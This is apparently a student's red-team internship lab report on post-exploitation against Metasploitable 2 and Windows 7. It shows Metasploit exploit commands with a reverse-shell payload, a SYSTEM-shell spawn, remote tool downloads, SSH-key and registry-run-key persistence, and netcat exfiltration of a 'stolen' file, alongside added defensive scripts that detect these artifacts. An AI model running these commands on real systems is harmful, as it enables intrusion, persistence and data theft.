## https://sploitus.com/exploit?id=0576642F-69AB-5A80-ACB3-8770C8E4F8A1
# Week 05 – Post-Exploitation & Privilege Escalation
**Intern:** Ali Ahsan | **Roll No:** CSI-B1-427
**Program:** Cyberstar Cybersecurity Red Teaming Internship
**Instructor:** Umar Niaz
**Date:** 06 April 2026
**Targets:** Metasploitable 2 (Linux) · Windows 7
---
## Overview
This week focused on escalating privileges from low-privilege accounts to root/SYSTEM on both Linux and Windows targets, establishing persistence, and exfiltrating data, which completes the post-exploitation phase of a real-world attack chain.
---
## Tasks Covered
### Task 01 – Linux Privilege Escalation (Metasploitable)
**Initial Access via VSFTPD Backdoor:**
```bash
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST
exploit
```
**Shell Stabilization:**
```bash
python -c 'import pty; pty.spawn("/bin/bash")'
```
**Manual Enumeration:**
```bash
sudo -l # Check sudo rights
find / -perm -u=s -type f 2>/dev/null # SUID binary search
```
**Automated Enumeration:**
- **LinPEAS** – comprehensive privilege escalation enumeration
- **LSE (Linux Smart Enumeration)** – supplementary context with verbosity level 2
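The `find / -perm -u=s` search above is also the defender's starting point: the same listing, compared against a baseline taken from a clean host, shows exactly which setuid files were added (or moved into temp directories) since the build. The script below is an added illustration and is not part of this write-up or of LinPEAS/LSE; the baseline set, the sample `find` output and the list of suspicious directories are constructed for the example.

```python
"""Audit SUID binaries against a known-good baseline.

Added illustration (not from the internship write-up). It compares the output of
`find / -perm -u=s -type f` with a baseline recorded on a clean host, so that
newly added setuid files stand out, and it ranks any that live in temp or home
directories as highest priority. BASELINE, FIND_OUTPUT and SUSPICIOUS_PREFIXES
are constructed sample data.
"""
from __future__ import annotations

import os
import stat

# Constructed baseline: what a clean install of this host had setuid.
BASELINE = {
    "/usr/bin/passwd",
    "/usr/bin/sudo",
    "/bin/su",
    "/bin/ping",
    "/usr/bin/nmap",
}

# Constructed sample output of `find / -perm -u=s -type f`, one path per line,
# captured on the host being audited.
FIND_OUTPUT = """\
/usr/bin/passwd
/usr/bin/sudo
/bin/su
/bin/ping
/usr/bin/nmap
/tmp/.x/bash
/usr/local/bin/vim
"""

# Directories in which a setuid regular file should essentially never live.
SUSPICIOUS_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")


def parse_find_output(text: str) -> set[str]:
    """Turn raw `find` output into a set of absolute paths, dropping blank lines."""
    return {line.strip() for line in text.splitlines() if line.strip()}


def audit_suid(current: set[str], baseline: set[str]) -> dict[str, list[str]]:
    """Classify setuid files: new vs. baseline, missing vs. baseline, and
    new ones sitting in temp/home locations (highest priority)."""
    new = sorted(current - baseline)
    missing = sorted(baseline - current)
    high = [p for p in new if p.startswith(SUSPICIOUS_PREFIXES)]
    return {"new": new, "missing": missing, "high_priority": high}


def live_suid_scan(root: str = "/") -> set[str]:
    """Collect setuid regular files by walking the filesystem (the `find`
    equivalent, for use on a real host instead of FIND_OUTPUT)."""
    found: set[str] = set()
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished entry; skip it
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.add(path)
    return found


if __name__ == "__main__":
    report = audit_suid(parse_find_output(FIND_OUTPUT), BASELINE)
    for key, paths in report.items():
        print(f"{key}: {paths}")
```

On a real host, replace `FIND_OUTPUT` with `live_suid_scan()` and keep the baseline under version control; a non-empty `high_priority` list is the item to investigate first, while a non-empty `missing` list usually means a package was removed or the baseline is stale.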
### Task 02 – Windows Privilege Escalation
**EternalBlue (MS17-010):**
```bash
use exploit/windows/smb/ms17_010_eternalblue
set RHOST
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit
```
**Token Impersonation – PrintSpoofer:**
```cmd
whoami /priv # Confirm SeImpersonatePrivilege
PrintSpoofer.exe -i -c cmd # Spawn SYSTEM shell
```
**Automated Enumeration:**
```cmd
certutil -urlcache -f http:///winPEAS.exe winPEAS.exe
powershell -ep bypass
. .\PowerUp.ps1; Invoke-AllChecks
```
### Task 03 – Establishing Persistence
**Linux – SSH Key Injection:**
```bash
ssh-keygen -t rsa -b 4096 -f ~/.ssh/id_rsa
cat ~/.ssh/id_rsa.pub >> /root/.ssh/authorized_keys
```
**Windows – Registry Run Key:**
```cmd
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Update" /t REG_SZ /d "C:\Users\Public\calc.exe" /f
```
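Both persistence techniques above leave a durable artifact that a defender can enumerate: an extra line in `/root/.ssh/authorized_keys` and an extra value under the HKCU `Run` key. The script below is an added illustration, not part of this write-up, showing how those two artifacts are audited: every key in `authorized_keys` is checked against an allowlist of approved public keys, and every `Run` value (as printed by `reg query`) is checked for an image path in a user-writable location. The allowlist, the `authorized_keys` contents, the `reg query` output and the list of writable prefixes are constructed sample data.

```python
"""Persistence audit: unapproved SSH keys and auto-run entries.

Added illustration (not from the internship write-up). Two independent checks:
  * parse an authorized_keys file (handling the optional leading options field)
    and report keys whose material is not on an approved list;
  * parse `reg query HKCU\\...\\Run` output and report values whose executable
    lives under a user-writable directory such as C:\\Users\\Public.
APPROVED_KEYS, AUTHORIZED_KEYS, REG_QUERY_OUTPUT and WRITABLE_PREFIXES are
constructed samples.
"""
from __future__ import annotations

import re

SSH_KEY_TYPES = {
    "ssh-rsa", "ssh-ed25519", "ssh-dss",
    "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521",
}

# Constructed: the single key the ops team approved for root on this host.
APPROVED_KEYS = {"AAAAC3NzaC1lZDI1NTE5AAAAIEXAMPLEAPPROVEDKEY0001"}

# Constructed /root/.ssh/authorized_keys as found during the audit.
AUTHORIZED_KEYS = """\
# managed by ops
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEXAMPLEAPPROVEDKEY0001 ops@jumphost
from="10.0.0.0/8" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABEXAMPLEUNKNOWNKEY0002 root@unrecognized-host
"""

# Constructed output of `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run`.
REG_QUERY_OUTPUT = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    Update    REG_SZ    C:\Users\Public\calc.exe
"""

# Locations an auto-run binary should not be executing from (normalised to
# lower case with forward slashes before comparison).
WRITABLE_PREFIXES = ("c:/users/public/", "c:/windows/temp/", "c:/temp/")


def parse_authorized_keys(text: str) -> list[dict]:
    """Return one dict per key line: type, key material, comment, options.
    Options without embedded whitespace (the common case) are handled."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        tokens = line.split()
        # Options such as from= or command= may precede the key type.
        idx = next((i for i, t in enumerate(tokens) if t in SSH_KEY_TYPES), None)
        if idx is None or idx + 1 >= len(tokens):
            continue  # malformed line, not a key
        entries.append({
            "type": tokens[idx],
            "key": tokens[idx + 1],
            "comment": " ".join(tokens[idx + 2:]),
            "options": " ".join(tokens[:idx]),
        })
    return entries


def unapproved_keys(text: str, approved: set[str]) -> list[dict]:
    """Keys present in the file whose material is not on the approved list."""
    return [e for e in parse_authorized_keys(text) if e["key"] not in approved]


RUN_VALUE = re.compile(r"^\s+(?P<name>\S.*?)\s{2,}(?P<type>REG_\w+)\s{2,}(?P<data>.*)$")


def image_path(data: str) -> str:
    """Extract the executable from a Run value: the quoted path, else the first token."""
    data = data.strip()
    if data.startswith('"'):
        end = data.find('"', 1)
        return data[1:end] if end > 0 else data[1:]
    return data.split()[0] if data else ""


def parse_run_values(text: str) -> list[dict]:
    """Turn `reg query` output into dicts with name, type, raw data and image path."""
    values = []
    for line in text.splitlines():
        m = RUN_VALUE.match(line)
        if m:
            values.append({"name": m["name"], "type": m["type"],
                           "data": m["data"], "image": image_path(m["data"])})
    return values


def suspicious_run_values(text: str) -> list[dict]:
    """Run values whose executable sits in a user-writable or temp location."""
    flagged = []
    for v in parse_run_values(text):
        norm = v["image"].lower().replace("\\", "/")
        if norm.startswith(WRITABLE_PREFIXES) or "/temp/" in norm:
            flagged.append(v)
    return flagged


if __name__ == "__main__":
    for e in unapproved_keys(AUTHORIZED_KEYS, APPROVED_KEYS):
        print(f"unapproved key: {e['type']} {e['comment']!r} options={e['options']!r}")
    for v in suspicious_run_values(REG_QUERY_OUTPUT):
        print(f"suspicious Run value: {v['name']} -> {v['image']}")
```

The SSH check keys on the public-key material rather than the comment, because the comment is free text the writer of the key controls; the Run-key check keys on where the binary lives rather than on the value name, because names like "Update" are easy to make look ordinary.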
### Task 04 – Data Exfiltration
**Netcat Transfer:**
```bash
# Receiver (Kali):
nc -lvnp 4444 > stolen.txt
# Sender (Target):
nc 4444 :8000/sensitive_file.txt
```
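Both transfer methods above (raw TCP to a Netcat listener on 4444, and an ad-hoc Python HTTP server on 8000) appear in flow or connection logs as an internal host moving a large volume of bytes over a port that carries no sanctioned traffic. The script below is an added illustration and not part of this write-up; it parses constructed Zeek-style `conn.log` records and flags such flows. The internal ranges, the expected-port list and the byte threshold are assumptions that a defender would tune for their own network.

```python
"""Flag bulk transfers to unexpected ports in connection logs.

Added illustration (not from the internship write-up). CONN_LOG is a constructed
sample in a Zeek conn.log-like tab-separated layout, reduced to eight columns:
ts, id.orig_h, id.orig_p, id.resp_h, id.resp_p, proto, orig_bytes, resp_bytes.
INTERNAL, EXPECTED_PORTS and BYTES_THRESHOLD are assumed tuning values.
"""
from __future__ import annotations

import ipaddress

# Constructed sample records: a 2.4 MB push to port 4444, a 1 MB pull from
# port 8000, ordinary HTTPS, and a DNS lookup.
CONN_LOG = """\
1712390400.10\t192.168.56.101\t50432\t192.168.56.103\t4444\ttcp\t2457600\t0
1712390411.55\t192.168.56.101\t50433\t192.168.56.103\t8000\ttcp\t512\t1048576
1712390420.02\t192.168.56.101\t50434\t93.184.216.34\t443\ttcp\t3200\t48000
1712390433.70\t192.168.56.102\t50500\t192.168.56.1\t53\tudp\t64\t120
"""

# Assumed: address space that counts as "ours" for the originating host.
INTERNAL = [ipaddress.ip_network("192.168.56.0/24"), ipaddress.ip_network("10.0.0.0/8")]
# Assumed: ports on which sanctioned traffic is expected; everything else is "unexpected".
EXPECTED_PORTS = {22, 53, 80, 123, 443}
# Assumed: bytes in one flow, in either direction, above which we call it "bulk".
BYTES_THRESHOLD = 1_000_000


def parse_conn_log(text: str) -> list[dict]:
    """Parse the eight-column records; skip comments, blanks and malformed lines."""
    records = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        f = line.split("\t")
        if len(f) != 8:
            continue
        records.append({
            "ts": float(f[0]), "orig_h": f[1], "orig_p": int(f[2]),
            "resp_h": f[3], "resp_p": int(f[4]), "proto": f[5],
            "orig_bytes": int(f[6]), "resp_bytes": int(f[7]),
        })
    return records


def is_internal(addr: str) -> bool:
    """True when the address falls inside one of the INTERNAL networks."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in INTERNAL)


def flag_transfers(records: list[dict],
                   expected_ports: set[int] = EXPECTED_PORTS,
                   threshold: int = BYTES_THRESHOLD) -> list[dict]:
    """Return records from internal hosts to unexpected ports that moved at
    least `threshold` bytes in one direction, tagged with the reason."""
    alerts = []
    for r in records:
        if not is_internal(r["orig_h"]) or r["resp_p"] in expected_ports:
            continue
        if r["orig_bytes"] >= threshold:
            alerts.append({**r, "reason": "bulk outbound to unexpected port"})
        elif r["resp_bytes"] >= threshold:
            alerts.append({**r, "reason": "bulk inbound from unexpected port"})
    return alerts


if __name__ == "__main__":
    for a in flag_transfers(parse_conn_log(CONN_LOG)):
        print(f"{a['orig_h']} -> {a['resp_h']}:{a['resp_p']} "
              f"out={a['orig_bytes']} in={a['resp_bytes']}  {a['reason']}")
```

The outbound branch is the exfiltration signature; the inbound branch catches the same ad-hoc HTTP server being used to stage tooling onto the host, which in practice precedes the exfiltration step. Port-based rules are a first filter only: the byte threshold and the per-host baseline are what keep the alert volume manageable.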
---
## Key Accomplishments
- Escalated from `www-data` to `root` on Linux via SUID binaries
- Achieved `NT AUTHORITY\SYSTEM` on Windows 7 via EternalBlue + PrintSpoofer
- Deployed and used LinPEAS, LSE, WinPEAS, PowerUp
- Established persistent backdoors on both targets
- Successfully exfiltrated data via Netcat and Python HTTP server
---
## Tools Used
`Metasploit` · `LinPEAS` · `LSE` · `WinPEAS` · `PowerUp` · `PrintSpoofer` · `Netcat` · `Python HTTP Server`
---
## Disclaimer
> Performed in an **authorized lab environment** using Metasploitable 2 and Windows 7 VMs. For educational purposes only.